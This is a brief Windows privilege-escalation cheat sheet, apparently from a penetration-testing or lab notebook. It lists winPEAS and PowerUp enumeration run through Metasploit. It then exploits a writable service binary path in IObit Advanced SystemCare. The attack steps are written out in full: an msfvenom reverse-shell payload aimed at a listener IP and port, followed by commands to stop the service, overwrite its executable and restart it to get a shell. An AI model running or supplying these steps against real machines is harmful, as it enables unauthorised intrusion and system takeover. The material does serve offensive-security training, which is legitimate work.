Windows Priv esc
Check if we are admin

Living of the land GTFO Bins for Windows
Enumeration with Winpeas
wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe
Enumeration with powerup.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
upload the script with metasploit
upload /root/PowerSploit/Privesc/PowerUp.ps1

Now run the script with Powershell
load Powershell
powershell_shell
.\PowerUp.ps1
Invoke-Allchecks




• List services which can be configured 👍
Get-ModifiableService -Verbose

We are also given the command to execute it.
• Unquoted Service Path 👍
Get-ServiceUnquoted -Verbose
unquoted service path vulnerability
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Now create a reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -
Now upload the malicious file and changer meterpreter to shell, stop the service and then copy the file the same location, start listener at port 4443 and start the service again.
upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and we got the reverse shell

Windows compiled exploits
Last updated